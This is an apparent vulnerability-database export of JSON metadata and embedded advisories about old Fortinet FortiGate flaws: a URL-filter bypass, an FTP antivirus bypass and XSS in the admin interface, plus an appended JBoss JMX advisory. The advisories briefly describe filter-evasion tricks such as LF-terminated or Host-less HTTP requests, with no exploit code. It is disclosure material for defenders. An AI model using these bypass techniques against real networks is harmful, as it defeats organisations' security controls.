],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14266"
},
{
"db": "BID",
"id": "16597"
},
{
"db": "PACKETSTORM",
"id": "43767"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-986"
},
{
"db": "NVD",
"id": "CVE-2005-3057"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-14266"
},
{
"db": "BID",
"id": "16597"
},
{
"db": "PACKETSTORM",
"id": "43767"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-986"
},
{
"db": "NVD",
"id": "CVE-2005-3057"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-14266"
},
{
"date": "2006-02-13T00:00:00",
"db": "BID",
"id": "16597"
},
{
"date": "2006-02-13T19:29:16",
"db": "PACKETSTORM",
"id": "43767"
},
{
"date": "2005-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200512-986"
},
{
"date": "2005-12-31T05:00:00",
"db": "NVD",
"id": "CVE-2005-3057"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-14266"
},
{
"date": "2009-07-12T17:56:00",
"db": "BID",
"id": "16597"
},
{
"date": "2011-07-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200512-986"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2005-3057"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-986"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Fortinet FortiGate Anti-virus engine bypass detection vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-986"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-986"
}
],
"trust": 0.6
}
}
VAR-200512-0019
Vulnerability from variot - Updated: 2025-04-03 22:10Interpretation conflict in Fortinet FortiGate 2.8, running FortiOS 2.8MR10 and v3beta, allows remote attackers to bypass the URL blocker via an (1) HTTP request terminated with a line feed (LF) and not carriage return line feed (CRLF) or (2) HTTP request with no Host field, which is still processed by most web servers without violating RFC2616. Fortinet FortiGate is prone to a vulnerability that could allow users to bypass the device's URL filtering. FortiGate devices running FortiOS v2.8MR10 and v3beta are vulnerable to this issue. Other versions may also be affected. Fortinet FortiGate is a network security platform developed by Fortinet. The platform provides functions such as firewall, antivirus and intrusion prevention (IPS), application control, antispam, wireless controller and WAN acceleration.
TITLE: FortiGate URL Filter and Virus Scanning Bypass Vulnerabilities
SECUNIA ADVISORY ID: SA18844
VERIFY ADVISORY: http://secunia.com/advisories/18844/
CRITICAL: Less critical
IMPACT: Security Bypass
WHERE:
From local network
OPERATING SYSTEM: Fortinet FortiOS (FortiGate) 2.x http://secunia.com/product/2289/ Fortinet FortiOS (FortiGate) 3.x http://secunia.com/product/6802/
DESCRIPTION: Mathieu Dessus has reported two vulnerabilities in FortiGate, which can be exploited by malicious people and users to bypass certain security restrictions.
1) The URL blocking functionality can be bypassed by specially-crafted HTTP requests that are terminated by the CR character instead of the CRLF characters. It is also possible to bypass the functionality via a HTTP/1.0 request with no host header.
The vulnerability has been reported in FortiOS v2.8MR10 and v3beta.
2) The virus scanning functionality can be bypassed when sending files over FTP under certain conditions.
The vulnerability has been reported in FortiOS v2.8MR10 and v3beta.
SOLUTION: Do not rely on URL blocking as the only means of blocking users' access. Desktop-based on-access virus scanners should be used together with server-based virus scanners.
PROVIDED AND/OR DISCOVERED BY: Mathieu Dessus
ORIGINAL ADVISORY: http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042139.html http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042140.html
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200512-0019",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fortigate",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": "2.8"
},
{
"model": "fortios",
"scope": "lte",
"trust": 1.0,
"vendor": "fortinet",
"version": "2.8_mr10"
},
{
"model": "fortios",
"scope": "lte",
"trust": 1.0,
"vendor": "fortinet",
"version": "3_beta"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.6,
"vendor": "fortinet",
"version": "2.8_mr10"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.6,
"vendor": "fortinet",
"version": "3_beta"
},
{
"model": "fortios beta",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3.0"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.80"
},
{
"model": "fortios mr5",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.50"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.50"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.36"
},
{
"model": "fortios mr10",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.8"
},
{
"model": "fortios 0mr4",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.5"
},
{
"model": "fortios",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "3.0"
},
{
"model": "fortios mr12",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.80"
}
],
"sources": [
{
"db": "BID",
"id": "16599"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-899"
},
{
"db": "NVD",
"id": "CVE-2005-3058"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mathieu Dessus mdessus@gmail.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-899"
}
],
"trust": 0.6
},
"cve": "CVE-2005-3058",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2005-3058",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-14267",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2005-3058",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200512-899",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-14267",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14267"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-899"
},
{
"db": "NVD",
"id": "CVE-2005-3058"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Interpretation conflict in Fortinet FortiGate 2.8, running FortiOS 2.8MR10 and v3beta, allows remote attackers to bypass the URL blocker via an (1) HTTP request terminated with a line feed (LF) and not carriage return line feed (CRLF) or (2) HTTP request with no Host field, which is still processed by most web servers without violating RFC2616. Fortinet FortiGate is prone to a vulnerability that could allow users to bypass the device\u0027s URL filtering. \nFortiGate devices running FortiOS v2.8MR10 and v3beta are vulnerable to this issue. Other versions may also be affected. Fortinet FortiGate is a network security platform developed by Fortinet. The platform provides functions such as firewall, antivirus and intrusion prevention (IPS), application control, antispam, wireless controller and WAN acceleration. \n\nTITLE:\nFortiGate URL Filter and Virus Scanning Bypass Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA18844\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/18844/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nSecurity Bypass\n\nWHERE:\n\u003eFrom local network\n\nOPERATING SYSTEM:\nFortinet FortiOS (FortiGate) 2.x\nhttp://secunia.com/product/2289/\nFortinet FortiOS (FortiGate) 3.x\nhttp://secunia.com/product/6802/\n\nDESCRIPTION:\nMathieu Dessus has reported two vulnerabilities in FortiGate, which\ncan be exploited by malicious people and users to bypass certain\nsecurity restrictions. \n\n1) The URL blocking functionality can be bypassed by\nspecially-crafted HTTP requests that are terminated by the CR\ncharacter instead of the CRLF characters. It is also possible to\nbypass the functionality via a HTTP/1.0 request with no host header. \n\nThe vulnerability has been reported in FortiOS v2.8MR10 and v3beta. \n\n2) The virus scanning functionality can be bypassed when sending\nfiles over FTP under certain conditions. \n\nThe vulnerability has been reported in FortiOS v2.8MR10 and v3beta. \n\nSOLUTION:\nDo not rely on URL blocking as the only means of blocking users\u0027\naccess. Desktop-based on-access virus scanners should be used\ntogether with server-based virus scanners. \n\nPROVIDED AND/OR DISCOVERED BY:\nMathieu Dessus\n\nORIGINAL ADVISORY:\nhttp://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042139.html\nhttp://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042140.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-3058"
},
{
"db": "BID",
"id": "16599"
},
{
"db": "VULHUB",
"id": "VHN-14267"
},
{
"db": "PACKETSTORM",
"id": "43767"
}
],
"trust": 1.35
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-14267",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14267"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2005-3058",
"trust": 2.0
},
{
"db": "BID",
"id": "16599",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "18844",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2006-0539",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200512-899",
"trust": 0.7
},
{
"db": "XF",
"id": "24626",
"trust": 0.6
},
{
"db": "FULLDISC",
"id": "20060213 URL FILTER BYPASS IN FORTINET",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20060213 URL FILTER BYPASS IN FORTINET",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "8486",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "27203",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-80820",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-14267",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "43767",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14267"
},
{
"db": "BID",
"id": "16599"
},
{
"db": "PACKETSTORM",
"id": "43767"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-899"
},
{
"db": "NVD",
"id": "CVE-2005-3058"
}
]
},
"id": "VAR-200512-0019",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14267"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-03T22:10:47.911000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14267"
},
{
"db": "NVD",
"id": "CVE-2005-3058"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-february/042140.html"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/16599"
},
{
"trust": 1.7,
"url": "http://www.fortiguard.com/advisory/fga-2006-10.html"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/18844"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/424858/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2006/0539"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24626"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/24626"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/424858/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2006/0539"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/8486"
},
{
"trust": 0.3,
"url": "http://fortinet.com/fortiguardcenter/url_vuln.html"
},
{
"trust": 0.3,
"url": "http://www.fortinet.com/"
},
{
"trust": 0.3,
"url": "/archive/1/485794"
},
{
"trust": 0.3,
"url": "/archive/1/485813"
},
{
"trust": 0.3,
"url": "/archive/1/424858"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/6802/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-february/042139.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/18844/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2289/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14267"
},
{
"db": "BID",
"id": "16599"
},
{
"db": "PACKETSTORM",
"id": "43767"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-899"
},
{
"db": "NVD",
"id": "CVE-2005-3058"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-14267"
},
{
"db": "BID",
"id": "16599"
},
{
"db": "PACKETSTORM",
"id": "43767"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-899"
},
{
"db": "NVD",
"id": "CVE-2005-3058"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-14267"
},
{
"date": "2006-02-13T00:00:00",
"db": "BID",
"id": "16599"
},
{
"date": "2006-02-13T19:29:16",
"db": "PACKETSTORM",
"id": "43767"
},
{
"date": "2005-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200512-899"
},
{
"date": "2005-12-31T05:00:00",
"db": "NVD",
"id": "CVE-2005-3058"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-19T00:00:00",
"db": "VULHUB",
"id": "VHN-14267"
},
{
"date": "2008-01-04T20:19:00",
"db": "BID",
"id": "16599"
},
{
"date": "2009-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200512-899"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2005-3058"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-899"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Fortinet FortiGate URL Check for filter bypass vulnerabilities",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-899"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-899"
}
],
"trust": 0.6
}
}
VAR-201802-0013
Vulnerability from variot - Updated: 2024-08-14 14:51Multiple cross-site scripting (XSS) vulnerabilities in Fortinet FortiGate UTM WAF appliances with FortiOS 4.3.x before 4.3.6 allow remote attackers to inject arbitrary web script or HTML via vectors involving the (1) Endpoint Monitor, (2) Dialup List, or (3) Log&Report Display modules, or the fields_sorted_opt parameter to (4) user/auth/list or (5) endpointcompliance/app_detect/predefined_sig_list. Fortinet FortiOS Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Fortinet FortiGate UTM WAF appliances is a firewall device from Fortinet. FortiOS is an operating system that runs on it. Remote attackers can exploit this vulnerability to inject arbitrary Web scripts or HTML. Title: ====== Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities
Date:
2012-01-27
References:
http://vulnerability-lab.com/get_content.php?id=144
VL-ID:
144
Introduction:
The FortiGate series of multi-threat security systems detect and eliminate the most damaging, content-based threats from email and Web traffic such as viruses, worms, intrusions, inappropriate Web content and more in real time - without degrading network performance.
Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 series for large enterprises, service providers and carriers, the FortiGate line combines the FortiOS™ security operating system with FortiASIC processors and other hardware to provide a comprehensive and high-performance array of security and networking functions including:
* Firewall, VPN, and Traffic Shaping
* Intrusion Prevention System (IPS)
* Antivirus/Antispyware/Antimalware
* Web Filtering
* Antispam
* Application Control (e.g., IM and P2P)
* VoIP Support (H.323. and SCCP)
* Layer 2/3 routing
* Multiple WAN interface options
FortiGate appliances provide cost-effective, comprehensive protection against network, content, and application-level threats - including complex attacks favored by cybercriminals - without degrading network availability and uptime. FortiGate platforms incorporate sophisticated networking features, such as high availability (active/active, active/passive) for maximum network uptime, and virtual domain (VDOM) capabilities to separate various networks requiring different security policies.
(Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate/ && http://www.avfirewalls.com/)
Abstract:
1.1 Vulnerability-Lab Team discovered multiple persistent Web Vulnerabilities on the FortiGate UTM Appliance Application.
1.2 Vulnerability-Lab Team discovered multiple non-persistent Web Vulnerabilities on the FortiGate UTM Appliance Application.
Report-Timeline:
2012-01-27: Public or Non-Public Disclosure
Status:
Published
Affected Products:
Exploitation-Technique:
Remote
Severity:
High
Details:
1.1 Multiple input validation vulnerabilities(persistent) are detected on FortGate UTM Appliance Series. Remote attacker can include (persistent) malicious script code to manipulate specific customer/admin requests. The vulnerability allows an local low privileged attacker to manipulate the appliance(application) via persistent script code inject.
It is also possible to hijack customer sessions via persistent script code execution on application side. Successful exploitation can also result in content/module request manipulation, execution of persistent malicious script code, session hijacking, account steal & phishing.
Vulnerable Module(s): (Persistent) [+] Endpoint => Monitor => Endpoint Monitor [+] Dailup List [+] Log&Report => Display
Picture(s): ../ive2.png ../ive3.png
1.2 Multiple input validation vulnerabilities(non-persistent) are detected on FortGate UTM Appliance Series. The vulnerability allows remote attackers to hijack admin/customer sessions with required user inter action (client-side). Successful exploitation allows to phish user accounts, redirect over client side requests or manipulate website context on client-side browser requests.
Vulnerable Module(s): (Non-Persistent) [+] Endpoint -> NAC -> Application Database -> Listings [+] List field sorted
Picture(s): ../ive1.png
Proof of Concept:
The vulnerabilities can be exploited by remote attackers with or without user inter action. For demonstration or reproduce ...
poc: => http://www.vulnerability-lab.com/get_content.php?id=144
Solution:
1.1 To fix/patch the persistent input validation vulnerabilities restrict the input fields & parse the input. Locate the vulnerable area(s) reproduce the bugs & parse the output after a malicious(test) insert. Setup a filter or restriction mask to prevent against future persistent input validation attacks.
1.2 To fix the client side input validation vulnerability parse the vulnerable request by filtering the input & cleanup the output. Set a input restriction or configure whitelist/filter to stop client side requests and form a secure exception-handling around.
Risk:
1.1 The security risk of the persistent vulnerabilities are estimated as high because of multiple persistent input validation vulnerabilities on different modules.
1.2 The security risk of the non-persistent cross site requests are estimated as low because of required user inter-action to hijack a not expired session.
Credits:
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
Disclaimer:
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.
Copyright © 2012|Vulnerability-Lab
-- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com
. ----------------------------------------------------------------------
SC Magazine awards the Secunia CSI a 5-Star rating Top-level rating for ease of use, performance, documentation, support, and value for money. Read more and get a free trial here: http://secunia.com/blog/296
TITLE: JBoss Multiple Products JMX Console Authentication Bypass
SECUNIA ADVISORY ID: SA47850
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/47850/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=47850
RELEASE DATE: 2012-02-06
DISCUSS ADVISORY: http://secunia.com/advisories/47850/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/47850/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=47850
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A security issue has been reported in multiple JBoss products, which can be exploited by malicious people to bypass certain security restrictions.
The security issue is caused due to improper access restrictions to the JMX Console.
For more information see vulnerability #1 in: SA39563
The security issue is reported in the following products: * JBoss Communications Platform 1.2 * JBoss Enterprise Application Platform 5.0 and 5.0.1 * JBoss Enterprise Portal Platform 4.3 * JBoss Enterprise Web Platform 5.0 * JBoss SOA-Platform 4.2, 4.3, and 5.0
SOLUTION: Update to a fixed version.
Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
ORIGINAL ADVISORY: JBPAPP-3952: https://issues.jboss.org/browse/JBPAPP-3952
JBPAPP-4713: https://issues.jboss.org/browse/JBPAPP-4713
Red Hat Doc#30741: https://access.redhat.com/kb/docs/DOC-30741
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
